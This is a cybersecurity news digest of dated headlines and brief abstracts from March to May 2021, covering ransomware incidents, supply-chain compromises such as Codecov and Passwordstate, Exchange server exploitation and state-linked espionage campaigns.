May 27, 2021
Fake Human Rights Organization, UN Branding Used by Chinese Threat Actor to Target Uyghurs in Ongoing Cyberattacks Full Text
Abstract
Potential victims are sent phishing documents branded with the UNHRC logo. Named UgyhurApplicationList.docx, this document contains decoy material relating to discussions of human rights violations.ZDNet
May 27, 2021
Canada Post Among 44 Organizations Linked to 950,000 Customers Impacted by Malware Attack at Crown Corporation Full Text
Abstract
A malware attack on Crown Corporation has caused a data breach affecting 44 of the company’s large business clients and their 950,000 receiving customers, the postal agency confirmed Wednesday.Global News
May 26, 2021
Google discovered a new variant of Rowhammer attack dubbed Half-Double Full Text
Abstract
Google experts discovered a new variant of Rowhammer attack against RAM memory cards that bypasses all current defenses Google researchers discovered a new variant of Rowhammer attacks, dubbed "Half-Double," that allows bypassing all current defenses. In...Security Affairs
May 26, 2021
Belgium Interior Ministry said it was hit by a sophisticated cyber attack Full Text
Abstract
The Belgian interior ministry was targeted by a "sophisticated" cyber attack, a spokesman told RTBF public television on Tuesday. The Belgian interior ministry was hit by a "sophisticated" cyber-espionage attack, the news was confirmed by a spokesman...Security Affairs
May 26, 2021
Bose Reveals Ransomware Attack Impacting Staff Full Text
Abstract
Threat actors accessed sensitive personal informationInfosecurity Magazine
May 25, 2021
Threat Actor ‘Agrius’ Emerges to Launch Wiper Attacks Against Israeli Targets Full Text
Abstract
The group is using ransomware intended to make its espionage and destruction efforts appear financially motivated.Threatpost
May 25, 2021
Codecov Supply Chain Attack Still Haunts Organizations Full Text
Abstract
Does the CodeCov supply chain attack has echoes of SolarWinds? More victims surface with time in yet another months-long ripple effect of a supply chain attack. Users of Codecov are suggested to perform a thorough scan of their CI-CD pipelines and change their secret keys and passwords.Cyware Alerts - Hacker News
May 25, 2021
TeamTNT Targets Kubernetes Clusters and Infiltrates Nearly 50,000 IPs in Worm-like Attack Full Text
Abstract
Most of the compromised nodes were from China and the United States — identified in the ISP list, which had Chinese and US-based providers as the highest hits, including some CSPs.Trend Micro
May 25, 2021
Hacking Attack on Japanese Dating App Omiai Puts 1.71 Million Users at Risk Full Text
Abstract
Japanese dating app operator Net Marketing Co. said Friday personal data of 1.71 million users, including names and face photos, was likely leaked due to unauthorized access to its server.The Japan Times
May 25, 2021
Audio equipment maker Bose Corporation discloses a ransomware attack Full Text
Abstract
The audio equipment manufacturer Bose Corporation said it was the victim of a ransomware attack that took place earlier this year, on March 7. Bose Corporation has announced it was the victim of a ransomware attack that took place earlier this year,...Security Affairs
May 25, 2021
Ransomware Hit: Tulsa Promises Recovery, Not Ransom Paying Full Text
Abstract
Restoration work is continuing. "All of our computer systems - with a few exceptions - are down right now," Michael Derringer, the city's CIO, said at a press conference on Thursday.Info Risk Today
May 24, 2021
Researchers Link CryptoCore Attacks On Cryptocurrency Exchanges to North Korea Full Text
Abstract
State-sponsored hackers affiliated with North Korea have been behind a slew of attacks on cryptocurrency exchanges over the past three years, new evidence has revealed. Attributing the attack with "medium-high" likelihood to the Lazarus Group (aka APT38 or Hidden Cobra), researchers from Israeli cybersecurity firm ClearSky said the campaign, dubbed " CryptoCore ," targeted crypto exchanges in Israel, Japan, Europe, and the U.S., resulting in the theft of millions of dollars worth of virtual currencies. The findings are a consequence of piecing together artifacts from a series of isolated but similar reports detailed by F-Secure , Japanese CERT JPCERT/CC , and NTT Security over the past few months. Since emerging on the scene in 2009, Hidden Cobra actors have used their offensive cyber capabilities to carry out espionage and cyber cryptocurrency heists against businesses and critical infrastructure. The adversary's targeting aligns with North KoreanThe Hacker News
May 24, 2021
FBI identifies 16 Conti ransomware attacks on US health care and first responder networks Full Text
Abstract
According to the FBI, these health care and first responder networks are among the more than 400 organizations worldwide victimized by Conti – and over 290 are located in the U.S.SCMagazine
May 24, 2021
Application Attacks Witnessed a Surge with Remote Working Full Text
Abstract
As per the NTT 2021 Global Threat Intelligence Report web application and application-specific attacks accounted for 67% of attacks in 2020. The data has been collected from January 1, 2020, to December 30, 2020.Cyware Alerts - Hacker News
May 23, 2021
Colonial Pipeline attack shows Canada must get serious about cybersecurity Full Text
Abstract
Ransomware attacks in Canada cost hundreds of millions of dollars in 2020 alone, with more than 4,000 attacks on our soil. In 2019, the official total was $2.3 billion, which is considered an extremely conservative estimate.National Post
May 21, 2021
Insurance Firm CNA Financial Reportedly Paid Hackers $40 Million in Ransom Full Text
Abstract
U.S. insurance giant CNA Financial reportedly paid $40 million to a ransomware gang to recover access to its systems following an attack in March, making it one the most expensive ransoms paid to date. The development was first reported by Bloomberg, citing "people with knowledge of the attack." The adversary that staged the intrusion is said to have allegedly demanded $60 million a week after the Chicago-based company began negotiations with the hackers, culminating in the payment two weeks following the theft of company data. In a statement shared on May 12, CNA Financial said it had "no evidence to indicate that external customers were potentially at risk of infection due to the incident." The attack has been attributed to new ransomware known as 'Phoenix CryptoLocker,' according to a March report from Bleeping Computer, with the strain believed to be an offshoot of WastedLocker and Hades, both of which have been utilized by Evil Corp , a RuThe Hacker News
May 21, 2021
Attackers Actively Striking with Cobalt Strike Full Text
Abstract
Researchers claim that the Cobalt Strike penetration testing kit, along with the Metasploit framework, was abused to host over 25% of malicious C2 servers deployed in 2020. Do you have a prepared strategy to protect organizations from this threat?Cyware Alerts - Hacker News
May 21, 2021
UK Insurance Firm One Call Targeted by Darkside Ransomware Gang Full Text
Abstract
The attack on the Doncaster-based insurance company was just a few days after the Colonial Pipeline's initial compromise on May 7 and one day before the ransomware gang claimed to be shutting up shop.The Register
May 21, 2021
Two Toyota Subsidiaries Across Europe and the US Hit by Ransomware Attacks Full Text
Abstract
The European operations of its subsidiary Daihatsu Diesel Company were hit by an attack, while the Toyota subsidiary Auto Parts Manufacturing Mississippi also revealed a ransomware attack.The Register
May 21, 2021
CNA Financial Paid $40 Million in Ransom After March Cyberattack Full Text
Abstract
CNA Financial, one of the largest U.S. insurance companies, paid $40 million in late March to regain control of its network after a ransomware attack, according to people familiar with the matter.Bloomberg
May 21, 2021
#RSAC: The Most Dangerous New Attack Techniques Full Text
Abstract
Annual panel at the RSA Conference identifies a number of areas of concern, including improper session handling and an evolution of ransomwareInfosecurity Magazine
May 20, 2021
Watering Hole Attack Was Used to Target Florida Water Utilities Full Text
Abstract
An investigation undertaken in the aftermath of the Oldsmar water plant hack earlier this year has revealed that an infrastructure contractor in the U.S. state of Florida hosted malicious code on its website in what's known as a watering hole attack. "This malicious code seemingly targeted water utilities, particularly in Florida, and more importantly, was visited by a browser from the city of Oldsmar on the same day of the poisoning event," Dragos researcher Kent Backman said in a write-up published on Tuesday. The site, which belongs to a Florida-based general contractor involved in building water and wastewater treatment facilities, had no bearing on the intrusion, the American industrial cybersecurity firm said. Watering hole attacks typically allow an adversary to compromise a specific group of end-users by compromising a carefully selected website, which members of that group are known to visit, with an intention to gain access to the victim's system anThe Hacker News
May 19, 2021
#RSAC: SolarWinds CEO Provides New Details into Attack and Response Full Text
Abstract
Sudhakar Ramakrishna gives details of investigations into the supply chain attackInfosecurity Magazine
May 19, 2021
Trailer maker Utility targeted in ransomware attack Full Text
Abstract
Utility Trailer Manufacturing, one of the largest U.S. producers of trailers for the trucking industry, was targeted in a ransomware attack that exposed personal information of numerous employees.Freight Waves
May 18, 2021
Colonial Pipeline servers experiencing ‘intermittent disruptions’ days after ransomware attack Full Text
Abstract
Colonial Pipeline announced Tuesday that its internal servers were experiencing “intermittent disruptions," but stressed the problem was separate from the devastating ransomware attack that disrupted operations earlier this month.The Hill
May 18, 2021
‘Flattered’ Russian spy chief denies SolarWinds attack Full Text
Abstract
The United States and Britain have blamed Russia’s Foreign Intelligence Service (SVR), for the hack which compromised nine U.S. federal agencies and hundreds of private sector companies.Reuters
May 18, 2021
70 European and South American Banks Under Attack By Bizarro Banking Malware Full Text
Abstract
A financially motivated cybercrime gang has unleashed a previously undocumented banking trojan, which can steal credentials from customers of 70 banks located in various European and South American countries. Dubbed " Bizarro " by Kaspersky researchers, the Windows malware is "using affiliates or recruiting money mules to operationalize their attacks, cashing out or simply to helping [sic] with transfers." The campaign consists of multiple moving parts, chief among them being the ability to trick users into entering two-factor authentication codes in fake pop-up windows that are then sent to the attackers, as well as its reliance on social engineering lures to convince visitors of banking websites into downloading a malicious smartphone app. Bizarro, which uses compromised WordPress, Amazon, and Azure servers to host the malware, is distributed via MSI packages downloaded by victims from sketchy links in spam emails. Launching the package downloads a ZIP archivThe Hacker News
May 17, 2021
AXA insurance subsidiary group hit by ransomware attack in multiple Asian countries Full Text
Abstract
A subsidiary group of French insurance giant AXA was hit by a ransomware attack last week that negatively impacted operations in multiple Asian countries.The Hill
May 17, 2021
FragAttacks: Affecting Millions of Wi-Fi Enabled Devices Full Text
Abstract
A total of 12 design and implementation flaws in IEEE 802.11 technical standards leave all WiFi devices vulnerable to attacks. These flaws can be exploited by attackers within the radio range of the target.Cyware Alerts - Hacker News
May 17, 2021
Bizarro Banking Trojan Expands its Attacks to 70 Banks From European and South American Countries Full Text
Abstract
Bizarro has x64 modules and is able to trick users into entering two-factor authentication codes in fake pop-ups. It may also use social engineering to convince victims to download a smartphone app.Kaspersky Labs
May 14, 2021
Toshiba unit hacked by DarkSide, conglomerate to undergo strategic review Full Text
Abstract
Toshiba Tec Corp, which makes products such as bar code printers and is valued at $2.3 billion, was hacked by DarkSide - the group behind the Colonial Pipeline attack, its French subsidiary said.Reuters
May 14, 2021
Rapid7 says source code, credentials accessed as a Rresult of Codecov supply-chain attack Full Text
Abstract
Rapid7 disclosed that unauthorized third-party had access to source code and customer data as result of Codecov supply chain attack. Cyber security vendor Rapid7 reveals it was impacted by the Codecov software supply chain attack, attackers had access...Security Affairs
May 13, 2021
Organizations in aerospace and travel sectors under attack, Microsoft warns Full Text
Abstract
Microsoft warns of a malware-based campaign that targeted organizations in the aerospace and travel sectors in the past months. Microsoft researchers revealed that organizations in the aerospace and travel sectors have been targeted in the past months...Security Affairs
May 12, 2021
Colonial Pipeline restarting operations after cyberattack Full Text
Abstract
Colonial Pipeline announced Wednesday that it has begun a restart of its operations after a cyberattack forced the company to shut down late last week, leading to gas shortages on the East Coast.The Hill
May 10, 2021
5 takeaways from attack on Colonial Pipeline Full Text
Abstract
The Colonial Pipeline, which transports about 45 percent of fuel consumed on the East Coast, shut down over the weekend due to a ransomware attack.The Hill
May 10, 2021
University Cancels Exams After Cyber-Attack Full Text
Abstract
America’s oldest technological research university cancels finals following cyber-intrusionInfosecurity Magazine
May 07, 2021
Microsoft: Business email compromise attack targeted dozens of orgs Full Text
Abstract
Microsoft detected a large-scale business email compromise (BEC) campaign that targeted more than 120 organization using typo-squatted domains registered days before the attacks began.BleepingComputer
May 7, 2021
Possible attacks on the TCP/IP protocol stack and countermeasures Full Text
Abstract
Let’s look at what types of threats each layer of the TCP/IP protocol stack may be susceptible to. The task of a computer security system is to safeguard the information transmitted over the network and to adequately preserve the data stored in it. Excluding...Security Affairs
May 6, 2021
Windows Moriya rootkit used in highly targeted attacks Full Text
Abstract
Experts spotted a new malware, dubbed Moriya rootkit, that targets Windows systems as part of cyberespionage campaign dubbed TunnelSnake. An unclassified threat actor employed a new stealthy malware, dubbed Moriya rootkit, to compromise Windows systems....Security Affairs
May 5, 2021
Cyber-Attack on Belgian Parliament Full Text
Abstract
Belgium’s parliament, universities, and police targeted in a coordinated DDoS attackInfosecurity Magazine
May 4, 2021
Telstra service provider hit by cyber attack as hackers claim SIM card information stolen Full Text
Abstract
The victim, Melbourne-based Schepisi Communications, is a partner of Telstra that supplies phone numbers and cloud storage services on behalf of the telecommunications giant.News.com.au
May 04, 2021
Twilio discloses impact from Codecov supply-chain attack Full Text
Abstract
Cloud communications company Twilio has now disclosed that the recent Codecov supply-chain attack exposed a small number of Twilio's customer email addresses.BleepingComputer
May 4, 2021
Virgin Active SA Suffers Cyber-Attack Full Text
Abstract
Virgin Active South Africa takes systems offline following cyber-attackInfosecurity Magazine
May 3, 2021
New Attacks Slaughter All Spectre Defenses Full Text
Abstract
The 3+ years computer scientists spent concocting ways to defend against these supply-chain attacks against chip architecture? It’s bound for the dustbin.Threatpost
April 29, 2021
SaaS Attacks: Lessons from Real-Life Misconfiguration Exploits Full Text
Abstract
There is a way to protect users from deceptive OAuth apps, misconfigurations and misappropriated user permissions. SaaS Security Posture Management (SSPM) takes an automated approach to tracking, and even remediating, the exploitable misconfigurations in organizations’ SaaS apps.Threatpost
April 28, 2021
Fourth time’s a charm - OGUsers hacking forum hacked again Full Text
Abstract
Popular hacking forum OGUsers has been hacked for its fourth time in two years, with hackers now selling the site's database containing user records and private messages.BleepingComputer
April 27, 2021
Ransomware Attack Forces Students Into Remote Learning at Guilderland Central School District Full Text
Abstract
The Guilderland Central School District near Albany was hit by a ransomware attack that forced students in grades 7 through 12 into all-remote learning on Monday, as confirmed by district officials.Security Affairs
April 26, 2021
Cyber-attack on NBA Team Full Text
Abstract
Investigation launched into cyber-attack on Houston RocketsInfosecurity Magazine
April 26, 2021
A supply chain attack compromised the update mechanism of Passwordstate Password Manager Full Text
Abstract
The software company Click Studios was the victim of a supply chain attack, hackers compromised its Passwordstate password management application. Another supply chain attack made the headlines, the Australian software company Click Studios informed...Security Affairs
April 23, 2021
Passwordstate password manager hacked in supply chain attack Full Text
Abstract
Click Studios, the company behind the Passwordstate password manager, notified customers that attackers compromised the app's update mechanism to deliver malware in a supply-chain attack after breaching its networks.BleepingComputer
April 23, 2021
Researchers say enterprise password manager hit in supply chain attack Full Text
Abstract
In an April 23 blog, the firm said they have digital evidence that Australian company ClickStudios suffered a breach, sometime between April 20 and April 22, that resulted in the attacker dropping a corrupted update to their password manager Passwordstate via a zip file containing a dynamic link library with malicious code.SCMagazine
April 23, 2021
Evil Maid Attack – Vacuum Hack Full Text
Abstract
Evil Maid Attack - Weaponizing an harmless vacuum cleaner hiding within it a small Rogue Device such as a Raspberry Pi. It is a typical day at the office. You are sitting at your desk, working hard at whatever it is that you do. The cleaning lady...Security Affairs
April 21, 2021
Black Kingdom and Microsoft Exchange Attacks Full Text
Abstract
The patch for ProxyLogon vulnerabilities was released more than a month ago. However, one more ransomware actor succeeded in joining the list of growing numbers of new adversaries exploiting it.Cyware Alerts - Hacker News
April 21, 2021
Codecov Supply Chain Attack May Hit Thousands: Report Full Text
Abstract
Investigators have reportedly already found hundreds of victim customersInfosecurity Magazine
April 20, 2021
Hundreds of networks reportedly hacked in Codecov supply-chain attack Full Text
Abstract
More details have emerged on the recent Codecov system breach which is being likened to the SolarWinds hack. In new reporting, investigators have stated that hundreds of customer networks have been breached in the incident, expanding the scope of this system breach beyond just Codecov's systems.BleepingComputer
April 20, 2021
Attackers Test Weak Passwords in Purple Fox Malware Attacks Full Text
Abstract
Weak passwords used over the Windows Server Message Block (SMB) protocol are often part of attacks that result in the spread of Purple Fox malware, Specops researchers report.Dark Reading
April 20, 2021
Hundreds of customer networks hacked in Codecov supply-chain attack Full Text
Abstract
More details have emerged on the recent Codecov system breach which is being likened to the SolarWinds hack. Sources state hundreds of customer networks have been breached in the incident, expanding the scope of this system breach to beyond just Codecov's systems.BleepingComputer
April 15, 2021
A Casino Gets Hacked Through a Fish-Tank Thermometer Full Text
Abstract
That was the lesson learned a few years ago from the operators of a North American casino. According to a 2018 Business Insider report, cybersecurity executive Nicole Eagan of security firm Darktrace told the story while addressing a conference.Entrepreneur
April 15, 2021
University of Hertfordshire hit by cyberattack Full Text
Abstract
The University of Hertfordshire was targetted by a cyberattack which resulted in the universities entire IT network being taken down, as well as all access to cloud-based services being blocked.IT Security Guru
April 15, 2021
NBA’s Houston Rockets probing cyber attack, working closely with FBI Full Text
Abstract
The Houston Rockets are investigating a cyber attack that attempted to install ransomware on the basketball team’s internal systems, and the organization is working closely with the FBI, team officials said.Reuters
April 14, 2021
New Jersey School Districts Investigate Cyber-Attacks Full Text
Abstract
Two Somerset County school districts suspect they were targeted by cyber-criminalsInfosecurity Magazine
April 13, 2021
Attacker hacked one Microsoft Exchange server to gain access to others Full Text
Abstract
The tactic is sophisticated, with firewalls unlikely to block traffic between Exchange servers and potentially giving such traffic a pass in terms of content inspection.SCMagazine
April 12, 2021
Iran Nuclear Facility Suffers Cyber-Attack Full Text
Abstract
Israeli public media claims Israel was behind a cyber-attack on Iran’s Natanz nuclear complexInfosecurity Magazine
April 9, 2021
Washington State Educational Organizations Targeted in Cryptojacking Campaign Full Text
Abstract
According to a new advisory released by Palo Alto Network's Unit 42 team, cryptojacking incidents have recently taken place against educational institutions in Washington State.ZDNet
April 08, 2021
Major DC insurance provider hacked by ‘foreign cybercriminals’ Full Text
Abstract
CareFirst BlueCross BlueShield’s Community Health Plan District of Columbia (CHPDC) suffered a data breach carried out by what it described as a “foreign cybercriminal” group in January that potentially impacted sensitive data, the company told customers this week.The Hill
April 8, 2021
Over 200 Bangladesh Organizations Hit by Hafnium Hacker Group Full Text
Abstract
According to a Cyber Threat Report released by the Bangladesh Government’s e-GOV CIRT on April 1st, hacker group Hafnium has launched attacks on more than 200 organizations in Bangladesh.Heimdal Security
April 7, 2021
Attackers Blowing Up Discord, Slack with Malware Full Text
Abstract
One Discord network search turned up 20,000 virus results, researchers found.Threatpost
April 06, 2021
European Commission, other EU orgs recently hit by cyber-attack Full Text
Abstract
The European Commission and several other European Union organizations were hit by a cyberattack in March according to a European Commission spokesperson.BleepingComputer
April 5, 2021
GitHub Infrastructure Used to Mine Cryptocurrency Full Text
Abstract
The threat actors seem to be targeting repositories that have GitHub Actions enabled in order to be able to add malicious Actions and fill Pull Requests aimed at executing malicious attacker code.Heimdal Security
April 3, 2021
Attackers Found Abusing GitHub Infrastructure to Mine Cryptocurrency Full Text
Abstract
GitHub launched an investigation in a series of attacks aimed at abusing its infrastructure to illicitly mine cryptocurrency. Such kind of attacks were reported at least since the end of 2020.Security Affairs
April 03, 2021
GitHub Actions being actively abused to mine cryptocurrency on GitHub servers Full Text
Abstract
GitHub Actions has been abused by attackers to mine cryptocurrency using GitHub's servers, automatically.The particular attack adds malicious GitHub Actions code to repositories forked from legitimate ones, and further creates a Pull Request for the original repository maintainers to merge the code back, to alter the original code.BleepingComputer
April 3, 2021
Attackers are abusing GitHub infrastructure to mine cryptocurrency Full Text
Abstract
The popular code repository hosting service GitHub is investigating a crypto-mining campaign abusing its infrastructure. Code repository hosting service GitHub launched an investigation in a series of attacks aimed at abusing its infrastructure...Security Affairs
April 03, 2021
Automated attack abuses GitHub Actions to mine cryptocurrency Full Text
Abstract
GitHub Actions has been abused by attackers to mine cryptocurrency using GitHub's servers, automatically.The particular attack adds malicious GitHub Actions code to repositories forked from legitimate ones, and further creates a Pull Request for the original repository maintainers to merge the code back, to alter the original code.BleepingComputer
April 1, 2021
Website of global parliamentary alliance on China suffers cyber attack Full Text
Abstract
The IPAC's website was down on Monday, after suffering a DDoS attack (distributed denial-of-service), causing the site to slow significantly, The Sydney Morning Herald reported.The Times Of India
March 30, 2021
30 Docker images downloaded 20M times in cryptojacking attacks Full Text
Abstract
Experts discovered that 30 malicious Docker images with a total number of 20 million pulls were involved in cryptomining operations. Palo Alto Network researcher Aviv Sasson discovered 30 malicious Docker images, which were downloaded 20 million...Security Affairs
March 29, 2021
PHP’s Git server hacked to add backdoors to PHP source code Full Text
Abstract
In the latest software supply chain attack, the official PHP Git repository was hacked and tampered with. Yesterday, two malicious commits were pushed to the php-src Git repository maintained by the PHP team on their git.php.net server. The threat actors had signed off on these commits as if they were made by known PHP developers.BleepingComputer
March 27, 2021
Instagram Business Accounts Under Attack by CopperStealer Full Text
Abstract
This malware is now targeting Instagram and Facebook business accounts to steal passwords stored in Edge, Chrome, Opera, Firefox, and Yandex.Cyware Alerts - Hacker News
March 26, 2021
German Parliament Bundestag targeted again by Russia-linked hackers Full Text
Abstract
Several members of the German Parliament (Bundestag) and other members of the state parliament were hit by a targeted attack allegedly launched by Russia-linked hackers. German newspaper Der Spiegel revealed that email accounts of multiple members...Security Affairs
March 26, 2021
German Parliament targeted again by Russian state hackers Full Text
Abstract
Email accounts of multiple German Parliament members were targeted in a spearphishing attack. It is not yet known if any data was stolen during the incident.BleepingComputer
March 25, 2021
Microsoft Exchange Attacks - Wild Tornado on Loose Full Text
Abstract
Weeks after the disclosure of the ProxyLogon group of security bugs, exploitation attempts against unpatched Microsoft Exchange servers have skyrocketed.Cyware Alerts - Hacker News
March 25, 2021
CNA Suffers “Sophisticated” Cyber-Attack Full Text
Abstract
Insurance giant’s website reduced to attack notice following Sunday cyber-strikeInfosecurity Magazine
March 24, 2021
SolarWinds Attackers Manipulated OAuth App Certificates Full Text
Abstract
The SolarWinds supply chain attackers manipulated OAuth app certificates to maintain persistence and access privileged resources including email, according to researchers at Proofpoint.Gov Info Security
March 24, 2021
Inside the Web Shell Used in the Microsoft Exchange Server Attacks Full Text
Abstract
China Chopper Web shells are an older threat causing new problems for many organizations targeted in ongoing attacks against vulnerable Microsoft Exchange Servers worldwide.Dark Reading
March 23, 2021
Podcast: Microsoft Exchange Server Attack Onslaught Continues Full Text
Abstract
Derek Manky, Chief of Security Insights & Global Threat Alliances at Fortinet’s FortiGuard Labs, gives insight into the surge in attacks against vulnerable Microsoft Exchange servers over the last week.Threatpost
March 23, 2021
Shell Latest to Fall to Accellion FTA Exploits Full Text
Abstract
Oil giant admits personal and corporate data was stolenInfosecurity Magazine
March 22, 2021
Ministry of Defence academy hit by state-sponsored hackers Full Text
Abstract
The Ministry of Defence academy was hit by a major cyber attack, Russia and China state-sponsored hackers are suspected to be behind the offensive The Ministry of Defence academy was hit by a major cyber attack, according to the British tabloid newspaper...Security Affairs
March 19, 2021
Beware the Package Typosquatting Supply Chain Attack Full Text
Abstract
Attackers are mimicking the names of existing packages on public registries in hopes that users or developers will accidentally download these malicious packages instead of legitimate ones.Dark Reading
March 19, 2021
RDP Attacks Reached Record Levels as More Employees Continue to Work from Home Full Text
Abstract
The vast majority of companies had to switch to remote work due to the Covid-19 pandemic. As life for large swaths of...Cyber Security News
March 18, 2021
Understanding and Responding to the SolarWinds Supply Chain Attack: The Federal Perspective Full Text
Abstract
On Thursday, March 18, 2021, at 10:15 a.m., the Senate Homeland Security and Governmental Affairs Committee will hold a hearing on understanding and responding to the SolarWinds supply chain attack.Lawfare
March 17, 2021
Chile’s bank regulator shares IOCs after Microsoft Exchange hack Full Text
Abstract
Chile's Comisión para el Mercado Financiero (CMF) has disclosed that their Microsoft Exchange server was compromised through the recently disclosed ProxyLogon vulnerabilities.BleepingComputer
March 17, 2021
China suspected of cyber attack on Western Australia’s Parliament during state election Full Text
Abstract
Western Australia's parliamentary email network was hit by suspected Chinese hackers earlier this month as part of a massive global cyber-attack involving Microsoft software.ABC
March 17, 2021
Nurseries sent first official cyber-attack warning Full Text
Abstract
Sarah Lyons, deputy director for economy and society engagement at the NCSC, said across educational settings it was "vital that all providers know how to secure their devices and sensitive data".BBC
March 16, 2021
UK Nurseries Get First Official Cyber-Attack Warning Full Text
Abstract
NCSC warns childminders and nurseries to safeguard personal data and be wary of malwareInfosecurity Magazine
March 16, 2021
Cream Finance and PancakeSwap Cryptocurrency Portals Experience DNS Hijacking Attacks Simultaneously Full Text
Abstract
According to a source who tipped The Record earlier today, the same attacker is believed to be behind both incidents as DNS records for both websites were changed within a minute of each other.The Record
March 15, 2021
Blender website in maintenance mode after hacking attempt Full Text
Abstract
Blender.org, the official website of the popular 3D computer graphics software Blender, is now in maintenance mode according to a message displayed on the site.BleepingComputer
March 15, 2021
New Browser cache-based side-channel Attack that Works Even When Script Execution is Completely Blocked Full Text
Abstract
Recently, a group of security researchers from the University of Michigan, the University of the Negev, and the University of Adelaide have...Cyber Security News
March 13, 2021
Molson Coors Production Stopped Following a Cyberattack Full Text
Abstract
A cyber attack took place at Molson Coors breweries based in Milwaukee. It looks like the hack was crippling, leaving the brewery unable to produce beer at the time of the attack.Heimdal Security
March 12, 2021
Researchers warn of a surge in cyber attacks against Microsoft Exchange Full Text
Abstract
Researchers warn of a surge in cyber attacks against Microsoft Exchange servers exploiting the recently disclosed ProxyLogon vulnerabilities. Researchers at Check Point Research team reported that threat actors are actively exploiting the recently...Security Affairs
March 12, 2021
University of Central Lancashire among three hit by cyber-attacks Full Text
Abstract
The University of the Highlands and Islands in Scotland and Queen's University in Belfast were also targeted. The National Cyber Security Centre has launched an investigation.BBC
March 11, 2021
New Browser Attack Allows Tracking Users Online With JavaScript Disabled Full Text
Abstract
Researchers have discovered a new side-channel that they say can be reliably exploited to leak information from web browsers that could then be leveraged to track users even when JavaScript is completely disabled. "This is a side-channel attack which doesn't require any JavaScript to run," the researchers said. "This means script blockers cannot stop it. The attacks work even if you strip out all of the fun parts of the web browsing experience. This makes it very difficult to prevent without modifying deep parts of the operating system." In avoiding JavaScript, the side-channel attacks are also architecturally agnostic, resulting in microarchitectural website fingerprinting attacks that work across hardware platforms, including Intel Core, AMD Ryzen, Samsung Exynos 2100, and Apple M1 CPUs — making it the first known side-channel attack on the iPhone maker's new ARM-based chipsets. The findings , which come from a group of academics from the Ben-Gurion UThe Hacker News
March 11, 2021
Molson Coors brewing operations disrupted by cyberattack Full Text
Abstract
The Molson Coors Beverage Company has suffered a cyberattack that is causing significant disruption to business operations.BleepingComputer
March 11, 2021
There is Still More to SolarWinds Attack Full Text
Abstract
Microsoft and FireEye uncover three more malware strains associated with the suspected Russian perpetrators who breached the SolarWinds software between August and September 2020.Cyware Alerts - Hacker News
March 11, 2021
Norwegian Parliament Hit by Second Cyberattack in Span of Six Months Full Text
Abstract
Hackers have infiltrated the Norwegian Parliament’s computer systems and extracted data, officials said on Wednesday, just six months after a previous cyber attack was made public.Reuters
March 10, 2021
Superstar K-Pop Band’s TikTok Hacked Full Text
Abstract
Hacker compromises BTS’s TikTok account and uploads creepy music videoInfosecurity Magazine
March 10, 2021
Norway parliament data stolen in Microsoft Exchange attack Full Text
Abstract
Norway's parliament, the Storting, has suffered another cyberattack after threat actors stole data using the recently disclosed Microsoft Exchange vulnerabilities.BleepingComputer
March 10, 2021
Hackers Break Into Verkada Surveillance Cameras at Tesla, Hundreds of Businesses Full Text
Abstract
The hackers sought to draw attention to the pervasive monitoring of people after having found login information for Verkada’s administrative tools publicly online this week, a researcher said.Reuters
March 10, 2021
NHS Regulator Faces Surge in Email Attacks During Vaccine Rollout Full Text
Abstract
The CQC was targeted by nearly 60,000 malicious email attacks from December 2020 to February 2021Infosecurity Magazine
March 9, 2021
EU Banking Regulator Hit by Microsoft Email Hack Full Text
Abstract
The EBA had said in a statement on Sunday that it had taken its email systems offline as a precaution, noting that access to personal data held on servers "may have been obtained by the attacker".Security Week
March 9, 2021
Supply Chain Attack Trends Involving Apps and Extensions Full Text
Abstract
The recent barcode scanner supply chain attack—buying the software, along with their source code and pushing the malformed version—is a new technique that will likely grow in popularity among cybercriminals.Cyware Alerts - Hacker News
March 9, 2021
University of the Highlands and Islands shuts down campuses as it deals with ‘ongoing cyber incident’ Full Text
Abstract
The institution, which spans 13 locations across the northernmost part of the UK, warned that "most services" – including its Brightspace virtual learning environment – were affected.The Register
March 9, 2021
The launch of Williams new FW43B car ruined by hackers Full Text
Abstract
The Williams team presented its new Formula One car on Friday, but hackers partially ruined the launch by hacking an “augmented reality” app that was designed to show the new vehicle.Security Affairs
March 8, 2021
How auto-scanning and scripting helped Exchange attackers rack up victims Full Text
Abstract
The lesson here: malicious actors continue to leverage the combination of automated scanners and scripts to strategically rack up high victim counts, especially when they sense time to inflict damage before patching is running out.SCMagazine
March 8, 2021
As Hafnium timeline crystalizes, signs of new Microsoft Exchange Server attacks emerge Full Text
Abstract
A surge of breaches against Microsoft Exchange Server appear to have rolled out in phases, with signs also pointing to other hackers using the same vulnerabilities after Microsoft announced a patch.SCMagazine
March 08, 2021
European Banking Authority discloses Exchange server hack Full Text
Abstract
The European Banking Authority (EBA) took down all email systems after their Microsoft Exchange Servers were hacked as part of the ongoing attacks targeting organizations worldwide.BleepingComputer
March 8, 2021
Multiple Airlines Affected Following SITA Cyberattack Full Text
Abstract
After SITA issued a statement confirming it had been the subject of a cyberattack, more airlines confirmed they have been directly affected. It appears the SITA breach affected all carrier members of Star Alliance and the One World alliance.Heimdal Security
March 08, 2021
Unpatched QNAP devices are being hacked to mine cryptocurrency Full Text
Abstract
Unpatched network-attached storage (NAS) devices are targeted in ongoing attacks where the attackers try to take them over and install cryptominer malware to mine for cryptocurrency.BleepingComputer
March 08, 2021
Microsoft Exchange Cyber Attack — What Do We Know So Far? Full Text
Abstract
Microsoft on Friday warned of active attacks exploiting unpatched Exchange Servers carried out by multiple threat actors, as the hacking campaign is believed to have infected tens of thousands of businesses, government entities in the U.S., Asia, and Europe. The company said "it continues to see increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM," signaling an escalation that the breaches are no longer "limited and targeted" as was previously deemed. According to independent cybersecurity journalist Brian Krebs , at least 30,000 entities across the U.S. — mainly small businesses, towns, cities, and local governments — have been compromised by an "unusually aggressive" Chinese group that has set its sights on stealing emails from victim organizations by exploiting previously undisclosed flaws in Exchange Server. Victims are also being reported from outside the U.S., with email syThe Hacker News
March 8, 2021
Czech officials in Prague ‘hit by massive cyber attack’ Full Text
Abstract
Czech officials in Prague have been hit by a large-scale cyberattack, according to the city's mayor. An immediate outage was made on the email system to maintain security.Euronews
March 8, 2021
Microsoft Attack Blamed On China Morphs Into Global Crisis Full Text
Abstract
A sophisticated attack on Microsoft Corp.’s widely used business email software is morphing into a global cybersecurity crisis, as hackers race to infect as many victims as possible before companies can secure their computer systems.Yahoo! Finance
March 5, 2021
Czech capital Prague, Labour Ministry face cyber attacks Full Text
Abstract
The Czech capital Prague and the Labour Ministry said there had been cyber attacks on their email systems but although the mayor of Prague said it was a large attack, he added the damage caused was limited.Reuters
March 5, 2021
